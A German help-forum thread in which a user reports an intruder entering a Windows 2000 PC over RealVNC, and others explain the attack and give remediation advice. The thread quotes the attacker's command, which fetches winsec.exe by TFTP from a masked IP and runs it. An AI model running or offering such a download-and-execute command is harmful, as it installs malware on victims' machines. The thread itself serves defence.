Hacker war über RealVNC auf meine PC
Hallo!
Ich hab auf meinem Windows 2000 Rechner RealVNC laufen, damit ich von der Arbeit aus auf diesen zugreifen kann.
Heute ist mir aufgefallen, dass in der Taskleiste ungefähr 10 mal cmd geöffnet war, obwohl ich diese nicht geöffnet hatte.
Einmal mit Tippfehler. Nachdem ich die CMD-Fenster geschlossen hatte, klickte mein Mauszeiger automatisch auf "ausführen" und gab den selben Code zum 11. mal ein.
Folgendes wurde unter "ausführen" eingegeben:
cmd /c tftp -i xx.xxx.xx.xxx GET winsec.exe &start winsec.exe &exit
(anstelle der x stand eine mir unbekannte IP-Adresse).
Zone Alarm fragte, ob es tftp zulassen soll. Diese Frage konnte der Hacker nicht beantworten, weil man via VNC keine Änderungen an Zone Alarm vornehmen kann.
(Hab ich selber getestet, weil ich mich gefragt hatte, warum der Hacker nicht einfach auf "zulassen" geklickt hat).
Die Verbindung von VNC hab ich mit einem 6 stelligen Passwort geschützt. Dies muss man am Anfang eingeben, damit man sich mit meinem PC verbinden kann. Trotzdem konnte sich der Hacker mit meinem PC verbinden.
Meine Fragen:
1. Was bewirkt der Code bzw. was wollte der Hacker erreichen?
2. Könnt irgendwas Schädliches auf meinem PC jetzt sein?
3. Wie kam der Hacker innerhalb eines Vormittags auf meine IP+Passwort?
4. Was kann ich tun, damit dies nicht nochmal passiert?
Vielen Dank
Ich hab auf meinem Windows 2000 Rechner RealVNC laufen, damit ich von der Arbeit aus auf diesen zugreifen kann.
Heute ist mir aufgefallen, dass in der Taskleiste ungefähr 10 mal cmd geöffnet war, obwohl ich diese nicht geöffnet hatte.
Einmal mit Tippfehler. Nachdem ich die CMD-Fenster geschlossen hatte, klickte mein Mauszeiger automatisch auf "ausführen" und gab den selben Code zum 11. mal ein.
Folgendes wurde unter "ausführen" eingegeben:
cmd /c tftp -i xx.xxx.xx.xxx GET winsec.exe &start winsec.exe &exit
(anstelle der x stand eine mir unbekannte IP-Adresse).
Zone Alarm fragte, ob es tftp zulassen soll. Diese Frage konnte der Hacker nicht beantworten, weil man via VNC keine Änderungen an Zone Alarm vornehmen kann.
(Hab ich selber getestet, weil ich mich gefragt hatte, warum der Hacker nicht einfach auf "zulassen" geklickt hat).
Die Verbindung von VNC hab ich mit einem 6 stelligen Passwort geschützt. Dies muss man am Anfang eingeben, damit man sich mit meinem PC verbinden kann. Trotzdem konnte sich der Hacker mit meinem PC verbinden.
Meine Fragen:
1. Was bewirkt der Code bzw. was wollte der Hacker erreichen?
2. Könnt irgendwas Schädliches auf meinem PC jetzt sein?
3. Wie kam der Hacker innerhalb eines Vormittags auf meine IP+Passwort?
4. Was kann ich tun, damit dies nicht nochmal passiert?
Vielen Dank
Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 42137
Url: https://administrator.de/forum/hacker-war-ueber-realvnc-auf-meine-pc-42137.html
Ausgedruckt am: 04.04.2025 um 00:04 Uhr
12 Kommentare
Neuester Kommentar
1. Was bewirkt der Code bzw. was wollte der
Hacker erreichen?
Hacker erreichen?
Dieser wollte wahrscheinlich eine Datei auf deinen PC laden tftp = Trivial File Transer Protocol
2. Könnt irgendwas Schädliches auf
meinem PC jetzt sein?
meinem PC jetzt sein?
Ist immer möglich. Virenscanner aktualisieren und evtl. ein Rootkit Scanner installieren und durchlaufen lassen.
3. Wie kam der Hacker innerhalb eines
Vormittags auf meine IP+Passwort?
Vormittags auf meine IP+Passwort?
Wenn du von deinem Geschäft aus diese Verbindung aufbaust, kann er sehr leicht einen Sniffer einbauen. Sonst gibt es Trojaner, Keylogger oder viele andere Möglichkeiten
4. Was kann ich tun, damit dies nicht
nochmal passiert?
nochmal passiert?
Evtl. VPN Tunnel einrichten, oder z.B. www.logmein.com hier wird die verbindung auch verschlüsselt
Weitere Ideen?
Grüsse Shaby
Hi,
welche Version von VNC hast Du denn installiert, soweit ich weiss gab es eine Version,
die einen Fehler hatte, der es erlaubte, sich ohne Passwort anzumelden (war glaub Version 4.0 von realVNC).
Also zuerst mal auf eine aktuelle VNC Version updaten.
Ein 6 stelliges Passwort ist nicht besonders sicher und mittels eines Passwort Testers relativ schnell gehackt, ich würde für einen Zugang, der direkt über das Internet erreichbar ist mindestens ein 8 stelliges besser noch längeres kryptisches Passwort gemischt aus Zahlen,
Buschstaben und Sonderzeichen verwenden.
Ich würde VNC erstmal komplett ausschalten und den PC einer gründlichen Untersuchung
mit verschiedenen Spyware-, Adware- und Virenscannern unterziehen.
Die in der Kommandozeile erwähnte winsec.exe könnte einen Bot/Wurm/Trojaner enthalten,
aber er hat es ja offensichtliche nicht geschafft, diese auszuführen.
Du könntest mir mal die IP per PM schicken, dann kann man mal schauen, woher der Angriff
kam.
Gruß
cykes
welche Version von VNC hast Du denn installiert, soweit ich weiss gab es eine Version,
die einen Fehler hatte, der es erlaubte, sich ohne Passwort anzumelden (war glaub Version 4.0 von realVNC).
Also zuerst mal auf eine aktuelle VNC Version updaten.
Ein 6 stelliges Passwort ist nicht besonders sicher und mittels eines Passwort Testers relativ schnell gehackt, ich würde für einen Zugang, der direkt über das Internet erreichbar ist mindestens ein 8 stelliges besser noch längeres kryptisches Passwort gemischt aus Zahlen,
Buschstaben und Sonderzeichen verwenden.
Ich würde VNC erstmal komplett ausschalten und den PC einer gründlichen Untersuchung
mit verschiedenen Spyware-, Adware- und Virenscannern unterziehen.
Die in der Kommandozeile erwähnte winsec.exe könnte einen Bot/Wurm/Trojaner enthalten,
aber er hat es ja offensichtliche nicht geschafft, diese auszuführen.
Du könntest mir mal die IP per PM schicken, dann kann man mal schauen, woher der Angriff
kam.
Gruß
cykes

Hallo,
Es kommt auch ein wenig auf die Qualität des Passworts an!
a) Kein Wort, das in irgendeinem Wörterbuch der Erde vorkommen kann ("MickyMaus" hat sogar 9 Buchstaben, aber den Rechner könnte auch ich "hacken").
b) Deshalb am besten sinnlose Kombinationen (siehe mein Vorredner: Zahlen, Buchstaben, Sonderzeichen)
Zur Not erstell Dir ein Eselslücken-Passwort:
--> Mein Computer, den ich sehr mag, wurde schon achtmal gehackt --> Anfangsbuchstaben: MC,ddism,ws8g
Super Passwort, nicht?
http://www.sophos.de/products/free-tools/sophos-anti-rootkit.html
http://www.pctipp.ch/downloads/dl/34539.asp?rssdloads
Gruß,
Tim
Ich kenn mich ein bisschen mit
Passwortsicherheit aus, dass man ein 6
stelliges aber so schnell hat, war mir nicht
bekannt.
Passwortsicherheit aus, dass man ein 6
stelliges aber so schnell hat, war mir nicht
bekannt.
Es kommt auch ein wenig auf die Qualität des Passworts an!
a) Kein Wort, das in irgendeinem Wörterbuch der Erde vorkommen kann ("MickyMaus" hat sogar 9 Buchstaben, aber den Rechner könnte auch ich "hacken").
b) Deshalb am besten sinnlose Kombinationen (siehe mein Vorredner: Zahlen, Buchstaben, Sonderzeichen)
Zur Not erstell Dir ein Eselslücken-Passwort:
--> Mein Computer, den ich sehr mag, wurde schon achtmal gehackt --> Anfangsbuchstaben: MC,ddism,ws8g
Super Passwort, nicht?
VNC ist jetzt natürlich aus, hab mir
eine neue IP zuweisen lassen und werd in den
nächsten Tagen den PC checken. Soll ich
auch einen Rootkit Scanner durchlaufen
lassen? Wenn ja, welcher ist empfehlenswert?
eine neue IP zuweisen lassen und werd in den
nächsten Tagen den PC checken. Soll ich
auch einen Rootkit Scanner durchlaufen
lassen? Wenn ja, welcher ist empfehlenswert?
http://www.sophos.de/products/free-tools/sophos-anti-rootkit.html
http://www.pctipp.ch/downloads/dl/34539.asp?rssdloads
Gruß,
Tim
Hi,
da gibt es ganz verschiedene Möglichkeiten, scheinbar war er erst am Anfang seiner "Arbeit"
und hat erstmal nach Möglichkeiten gesucht, irgendwelche "Tools" zu installieren.
Sieht auf jeden Fall sehr nach nem ScriptKiddie aus.
Würde mir da nicht zu viele Sorgen machen, wenn Du den Rechner überprüft hast und er OK ist,
dann den VNC besser absichern und obvenstehende Tips befolgen, dann passt das schon
wieder.
Gruß
cykes
da gibt es ganz verschiedene Möglichkeiten, scheinbar war er erst am Anfang seiner "Arbeit"
und hat erstmal nach Möglichkeiten gesucht, irgendwelche "Tools" zu installieren.
Sieht auf jeden Fall sehr nach nem ScriptKiddie aus.
Würde mir da nicht zu viele Sorgen machen, wenn Du den Rechner überprüft hast und er OK ist,
dann den VNC besser absichern und obvenstehende Tips befolgen, dann passt das schon
wieder.
Gruß
cykes

Hallo,
Winsec.exe ist ein Schadprogramm und kein Windows-Tool!
http://www.securitystronghold.com/gates/spyware-adware-solutions/Window ...
http://www.bleepingcomputer.com/startups/winsecexe-6510.html
& ist in der CMD-Shell ein Befehlsseparator. Das stellt sicher, dass alle Ausdrücke, vor denen & steht als eigener Befehl interpretiert werden und nicht als Parameter des vorhergehenden.
Er hatte vor, das Programm winsec.exe auf Deinen Rechner zu bringen und es zu starten. Das Programm hätte sich dann in die Registry eingetragen, um dauerhaft immer automatisch mitgestartet zu werden. Wie es aussieht, ist winsec.exe eine Variante der "Cool Web Search"-Malware. Das hätte auf jeden Fall dazu geführt, dass Du mit Popups usw. belästigt worden wärst; dein Browser wäre auf eine andere Startseite umgeleitet worden und evtl. wäre auch Deine hosts-Datei bearbeitet worden. Alles in allem sehe ich das eher als Nervigkeit, nicht aber als unbedingte Gefahr (soviel zur ersten Beruhigung).
Eventuell wäre es gut, wenn Du mal Adaware laufen lässt!
Gruß,
Tim
Wie schon erwähnt wurde, wollte der
Hacker evt. einen Virus übertragen.
Doch warum nimmt er dazu die winsec.exe
Hacker evt. einen Virus übertragen.
Doch warum nimmt er dazu die winsec.exe
Winsec.exe ist ein Schadprogramm und kein Windows-Tool!
http://www.securitystronghold.com/gates/spyware-adware-solutions/Window ...
http://www.bleepingcomputer.com/startups/winsecexe-6510.html
Was hat die exe für eine Funktion.
Außerdem warum benutzt er &start
und &exit? Dies kommt in der Sytax von
tftp doch gar nicht vor.
Außerdem warum benutzt er &start
und &exit? Dies kommt in der Sytax von
tftp doch gar nicht vor.
& ist in der CMD-Shell ein Befehlsseparator. Das stellt sicher, dass alle Ausdrücke, vor denen & steht als eigener Befehl interpretiert werden und nicht als Parameter des vorhergehenden.
Wollte der Hacker meinen PC als eine Art
Abstellplatz für Daten verwenden oder
hatte er etwas anderes vor?
Abstellplatz für Daten verwenden oder
hatte er etwas anderes vor?
Er hatte vor, das Programm winsec.exe auf Deinen Rechner zu bringen und es zu starten. Das Programm hätte sich dann in die Registry eingetragen, um dauerhaft immer automatisch mitgestartet zu werden. Wie es aussieht, ist winsec.exe eine Variante der "Cool Web Search"-Malware. Das hätte auf jeden Fall dazu geführt, dass Du mit Popups usw. belästigt worden wärst; dein Browser wäre auf eine andere Startseite umgeleitet worden und evtl. wäre auch Deine hosts-Datei bearbeitet worden. Alles in allem sehe ich das eher als Nervigkeit, nicht aber als unbedingte Gefahr (soviel zur ersten Beruhigung).
Eventuell wäre es gut, wenn Du mal Adaware laufen lässt!
Gruß,
Tim